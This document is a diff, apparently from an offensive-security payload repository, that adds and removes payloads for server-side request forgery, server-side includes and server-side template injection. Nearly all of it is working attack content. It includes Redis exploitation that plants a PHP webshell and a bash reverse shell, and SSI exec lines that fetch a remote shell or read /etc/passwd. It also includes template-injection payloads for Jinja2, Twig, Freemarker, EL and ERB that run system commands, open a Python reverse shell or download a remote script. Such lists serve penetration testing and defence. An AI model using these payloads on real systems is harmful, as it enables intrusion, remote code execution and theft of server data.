* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||||
* [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
|
* [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
|
||||||
|
@ -76,22 +79,6 @@ http://localhost:443
|
||||||
http://localhost:22
|
http://localhost:22
|
||||||
```
|
```
|
||||||
|
|
||||||
Advanced exploit using a redirection
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
|
|
||||||
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
|
||||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
|
||||||
```
|
|
||||||
|
|
||||||
Advanced exploit using type=url
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
Change "type=file" to "type=url"
|
|
||||||
Paste URL in text field and hit enter
|
|
||||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
|
||||||
```
|
|
||||||
|
|
||||||
## Bypassing filters
|
## Bypassing filters
|
||||||
|
|
||||||
### Bypass using HTTPS
|
### Bypass using HTTPS
|
||||||
|
@ -177,6 +164,15 @@ http://127.1
|
||||||
http://127.0.1
|
http://127.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass using URL encoding
|
||||||
|
|
||||||
|
[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.0.0.1/%61dmin
|
||||||
|
http://127.0.0.1/%2561dmin
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass using bash variables
|
### Bypass using bash variables
|
||||||
|
|
||||||
(curl only)
|
(curl only)
|
||||||
|
@ -225,6 +221,30 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
|
|
||||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
|
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
|
||||||
|
|
||||||
|
### Bypassing using a redirect
|
||||||
|
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
|
||||||
|
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||||
|
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
### Bypassing using type=url
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Change "type=file" to "type=url"
|
||||||
|
Paste URL in text field and hit enter
|
||||||
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
|
```
|
||||||
|
|
||||||
|
### Bypassing using DNS Rebinding (TOCTOU)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
|
||||||
|
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
|
||||||
|
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
|
||||||
|
```
|
||||||
|
|
||||||
## SSRF exploitation via URL Scheme
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
|
@ -378,6 +398,32 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
|
||||||
| value data | (n bytes) | | /tmp/test.py | |
|
| value data | (n bytes) | | /tmp/test.py | |
|
||||||
|
|
||||||
|
|
||||||
|
## SSRF exploiting Redis
|
||||||
|
|
||||||
|
> Redis is a database system that stores everything in RAM
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Getting a webshell
|
||||||
|
url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
|
||||||
|
url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
|
||||||
|
url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
|
||||||
|
url=dict://127.0.0.1:6379/SAVE
|
||||||
|
|
||||||
|
# Getting a PHP reverse shell
|
||||||
|
gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
|
||||||
|
gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
|
||||||
|
gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22
|
||||||
|
gopher://127.0.0.1:6379/_save
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSRF exploiting PDF file
|
||||||
|
|
||||||
|
Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
<link rel=attachment href="file:///root/secret.txt">
|
||||||
|
```
|
||||||
|
|
||||||
## SSRF to XSS
|
## SSRF to XSS
|
||||||
|
|
||||||
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
@ -389,6 +435,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple
|
||||||
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SSRF from XSS
|
||||||
|
|
||||||
|
### Using an iframe
|
||||||
|
|
||||||
|
The content of the file will be integrated inside the PDF as an image or text.
|
||||||
|
|
||||||
|
```html
|
||||||
|
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Using an attachment
|
||||||
|
|
||||||
|
Example of a PDF attachment using HTML
|
||||||
|
|
||||||
|
1. use `<link rel=attachment href="URL">` as Bio text
|
||||||
|
2. use 'Download Data' feature to get PDF
|
||||||
|
3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
|
||||||
|
4. `cat attachment.bin`
|
||||||
|
|
||||||
## SSRF URL for Cloud Instances
|
## SSRF URL for Cloud Instances
|
||||||
|
|
||||||
### SSRF URL for AWS Bucket
|
### SSRF URL for AWS Bucket
|
||||||
|
@ -407,7 +472,6 @@ DNS record
|
||||||
```powershell
|
```powershell
|
||||||
http://instance-data
|
http://instance-data
|
||||||
http://169.254.169.254
|
http://169.254.169.254
|
||||||
http://metadata.nicob.net/
|
|
||||||
http://169.254.169.254.xip.io/
|
http://169.254.169.254.xip.io/
|
||||||
http://1ynrnhl.xip.io/
|
http://1ynrnhl.xip.io/
|
||||||
http://www.owasp.org.1ynrnhl.xip.io/
|
http://www.owasp.org.1ynrnhl.xip.io/
|
||||||
|
|
|
@ -1,75 +0,0 @@
|
||||||
<pre><!--#exec cmd="ls" --></pre>
|
|
||||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
|
||||||
<pre><!--#exec cmd="whoami"--></pre>
|
|
||||||
<pre><!--#exec cmd="dir" --></pre>
|
|
||||||
<!--#exec cmd="ls" -->
|
|
||||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
|
||||||
<!--#exec cmd="/bin/ls /" -->
|
|
||||||
<!--#exec cmd="dir" -->
|
|
||||||
<!--#exec cmd="cd C:\WINDOWS\System32">
|
|
||||||
<!--#config errmsg="File not found, informs users and password"-->
|
|
||||||
<!--#echo var="DOCUMENT_NAME" -->
|
|
||||||
<!--#echo var="DOCUMENT_URI" -->
|
|
||||||
<!--#config timefmt="A %B %d %Y %r"-->
|
|
||||||
<!--#fsize file="ssi.shtml" -->
|
|
||||||
<!--#include file=?UUUUUUUU...UU?-->
|
|
||||||
<!--#echo var="DATE_LOCAL" -->
|
|
||||||
<!--#exec cmd="whoami"-->
|
|
||||||
<!--#printenv -->
|
|
||||||
<!--#flastmod virtual="echo.html" -->
|
|
||||||
<!--#echo var="auth_type" -->
|
|
||||||
<!--#echo var="http_referer" -->
|
|
||||||
<!--#echo var="content_length" -->
|
|
||||||
<!--#echo var="content_type" -->
|
|
||||||
<!--#echo var="http_accept_encoding" -->
|
|
||||||
<!--#echo var="forwarded" -->
|
|
||||||
<!--#echo var="document_uri" -->
|
|
||||||
<!--#echo var="date_gmt" -->
|
|
||||||
<!--#echo var="date_local" -->
|
|
||||||
<!--#echo var="document_name" -->
|
|
||||||
<!--#echo var="document_root" -->
|
|
||||||
<!--#echo var="from" -->
|
|
||||||
<!--#echo var="gateway_interface" -->
|
|
||||||
<!--#echo var="http_accept" -->
|
|
||||||
<!--#echo var="http_accept_charset" -->
|
|
||||||
<!--#echo var="http_accept_language" -->
|
|
||||||
<!--#echo var="http_connection" -->
|
|
||||||
<!--#echo var="http_cookie" -->
|
|
||||||
<!--#echo var="http_form" -->
|
|
||||||
<!--#echo var="http_host" -->
|
|
||||||
<!--#echo var="user_name" -->
|
|
||||||
<!--#echo var="unique_id" -->
|
|
||||||
<!--#echo var="tz" -->
|
|
||||||
<!--#echo var="total_hits" -->
|
|
||||||
<!--#echo var="server_software" -->
|
|
||||||
<!--#echo var="server_protocol" -->
|
|
||||||
<!--#echo var="server_port" -->
|
|
||||||
<!--#echo var="server_name -->
|
|
||||||
<!--#echo var="server_addr" -->
|
|
||||||
<!--#echo var="server_admin" -->
|
|
||||||
<!--#echo var="script_url" -->
|
|
||||||
<!--#echo var="script_uri" -->
|
|
||||||
<!--#echo var="script_name" -->
|
|
||||||
<!--#echo var="script_filename" -->
|
|
||||||
<!--#echo var="netsite_root" -->
|
|
||||||
<!--#echo var="site_htmlroot" -->
|
|
||||||
<!--#echo var="path_translated" -->
|
|
||||||
<!--#echo var="path_info_translated" -->
|
|
||||||
<!--#echo var="request_uri" -->
|
|
||||||
<!--#echo var="request_method" -->
|
|
||||||
<!--#echo var="remote_user" -->
|
|
||||||
<!--#echo var="remote_addr" -->
|
|
||||||
<!--#echo var="http_client_ip" -->
|
|
||||||
<!--#echo var="remote_port" -->
|
|
||||||
<!--#echo var="remote_ident" -->
|
|
||||||
<!--#echo var="remote_host" -->
|
|
||||||
<!--#echo var="query_string_unescaped" -->
|
|
||||||
<!--#echo var="query_string" -->
|
|
||||||
<!--#echo var="path_translated" -->
|
|
||||||
<!--#echo var="path_info" -->
|
|
||||||
<!--#echo var="path" -->
|
|
||||||
<!--#echo var="page_count" -->
|
|
||||||
<!--#echo var="last_modified" -->
|
|
||||||
<!--#echo var="http_user_agent" -->
|
|
||||||
<!--#echo var="http_ua_os" -->
|
|
||||||
<!--#echo var="http_ua_cpu" -->
|
|
|
@ -1,18 +0,0 @@
|
||||||
</nowiki>
|
|
||||||
<!--#echo var="DOCUMENT_NAME" -->
|
|
||||||
<!--#echo var="DOCUMENT_URI" -->
|
|
||||||
<!--#config timefmt="A %B %d %Y %r"-->
|
|
||||||
<!--#echo var="DATE_LOCAL" -->
|
|
||||||
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
|
||||||
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
|
||||||
<!--#include virtual="/" -->
|
|
||||||
<!--#exec cmd="ls" -->
|
|
||||||
<!--#exec cmd="whoami" -->
|
|
||||||
<!--#exec cmd="uname" -->
|
|
||||||
<!--#exec cmd="dir" -->
|
|
||||||
<!--#exec cmd="cat /etc/passwd" -->
|
|
||||||
<!--#exec cmd="ipconfig" -->
|
|
||||||
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
|
||||||
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
|
||||||
<!--#exec cmd="sleep 5" -->
|
|
||||||
<!--#exec cmd="sleep 10" -->
|
|
|
@ -0,0 +1,49 @@
|
||||||
|
|
||||||
|
{{4*4}}[[5*5]]
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}}
|
||||||
|
<%= 7 * 7 %>
|
||||||
|
${3*3}
|
||||||
|
${{7*7}}
|
||||||
|
@(1+2)
|
||||||
|
#{3*3}
|
||||||
|
#{ 7 * 7 }
|
||||||
|
{{dump(app)}}
|
||||||
|
{{app.request.server.all|join(',')}}
|
||||||
|
{{config.items()}}
|
||||||
|
{{ [].class.base.subclasses() }}
|
||||||
|
{{''.class.mro()[1].subclasses()}}
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
|
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
|
||||||
|
{{'a'.toUpperCase()}}
|
||||||
|
{{ request }}
|
||||||
|
{{self}}
|
||||||
|
<%= File.open('/etc/passwd').read %>
|
||||||
|
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||||
|
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||||
|
${"freemarker.template.utility.Execute"?new()("id")}
|
||||||
|
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
|
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
|
||||||
|
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
|
||||||
|
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
|
||||||
|
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
|
||||||
|
{$smarty.version}
|
||||||
|
{php}echo `id`;{/php}
|
||||||
|
{{['id']|filter('system')}}
|
||||||
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
|
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||||
|
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||||
|
{{request|attr(["__","class","__"]|join)}}
|
||||||
|
{{request|attr("__class__")}}
|
||||||
|
{{request.__class__}}
|
||||||
|
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
|
||||||
|
${T(java.lang.System).getenv()}
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
|
@ -14,9 +14,13 @@
|
||||||
* [Basic injection](#basic-injection)
|
* [Basic injection](#basic-injection)
|
||||||
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
||||||
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [Expression Language EL](#expression-language-el)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Code execution](#code-execution)
|
||||||
* [Twig](#twig)
|
* [Twig](#twig)
|
||||||
* [Basic injection](#basic-injection)
|
* [Basic injection](#basic-injection)
|
||||||
* [Template format](#template-format)
|
* [Template format](#template-format)
|
||||||
|
* [Arbitrary File Reading](#arbitrary-file-reading)
|
||||||
* [Code execution](#code-execution)
|
* [Code execution](#code-execution)
|
||||||
* [Smarty](#smarty)
|
* [Smarty](#smarty)
|
||||||
* [Freemarker](#freemarker)
|
* [Freemarker](#freemarker)
|
||||||
|
@ -40,6 +44,9 @@
|
||||||
* [Jinjava](#jinjava)
|
* [Jinjava](#jinjava)
|
||||||
* [Basic injection](#basic-injection)
|
* [Basic injection](#basic-injection)
|
||||||
* [Command execution](#command-execution)
|
* [Command execution](#command-execution)
|
||||||
|
* [ASP.NET Razor](#aspnet-razor)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Command execution](#command-execution)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
@ -87,6 +94,17 @@ Slim:
|
||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= system('cat /etc/passwd') %>
|
||||||
|
<%= `ls /` %>
|
||||||
|
<%= IO.popen('ls /').readlines() %>
|
||||||
|
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
|
||||||
|
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Execute code using SSTI for Slim engine.
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -119,6 +137,47 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Expression Language EL
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```java
|
||||||
|
${1+1}
|
||||||
|
#{1+1}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Code Execution
|
||||||
|
|
||||||
|
|
||||||
|
```java
|
||||||
|
// Common RCE payloads
|
||||||
|
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
||||||
|
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()
|
||||||
|
|
||||||
|
// Method using Runtime
|
||||||
|
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
|
||||||
|
#{session.getAttribute("rtc").setAccessible(true)}
|
||||||
|
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
|
||||||
|
|
||||||
|
// Method using processbuilder
|
||||||
|
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
|
||||||
|
${request.getAttribute("c").add("cmd.exe")}
|
||||||
|
${request.getAttribute("c").add("/k")}
|
||||||
|
${request.getAttribute("c").add("ping x.x.x.x")}
|
||||||
|
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
|
||||||
|
${request.getAttribute("a")}
|
||||||
|
|
||||||
|
// Method using Reflection & Invoke
|
||||||
|
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
|
||||||
|
|
||||||
|
// Method using ScriptEngineManager one-liner
|
||||||
|
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
|
||||||
|
|
||||||
|
// Method using ScriptEngineManager
|
||||||
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Twig
|
## Twig
|
||||||
|
|
||||||
### Basic injection
|
### Basic injection
|
||||||
|
@ -126,6 +185,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
|
||||||
```python
|
```python
|
||||||
{{7*7}}
|
{{7*7}}
|
||||||
{{7*'7'}} would result in 49
|
{{7*'7'}} would result in 49
|
||||||
|
{{dump(app)}}
|
||||||
|
{{app.request.server.all|join(',')}}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Template format
|
### Template format
|
||||||
|
@ -142,12 +203,28 @@ $output = $twig > render (
|
||||||
);
|
);
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Arbitrary File Reading
|
||||||
|
|
||||||
|
```python
|
||||||
|
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
|
||||||
|
```
|
||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{self}}
|
{{self}}
|
||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
{{['id']|filter('system')}}
|
||||||
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
|
||||||
|
email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
||||||
```
|
```
|
||||||
|
|
||||||
## Smarty
|
## Smarty
|
||||||
|
@ -368,6 +445,11 @@ Bypassing `|join`
|
||||||
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
|
||||||
|
```python
|
||||||
|
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||||
|
```
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
### Basic injection
|
### Basic injection
|
||||||
|
@ -394,6 +476,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## ASP.NET Razor
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
@(1+2)
|
||||||
|
```
|
||||||
|
|
||||||
|
### Command execution
|
||||||
|
|
||||||
|
```csharp
|
||||||
|
@{
|
||||||
|
// C# code
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
@ -410,3 +507,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
||||||
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
||||||
|
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
||||||
|
* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
||||||
|
* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
|
||||||
|
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
|
@ -42,9 +42,13 @@ var_dump(md5([])); # NULL
|
||||||
|
|
||||||
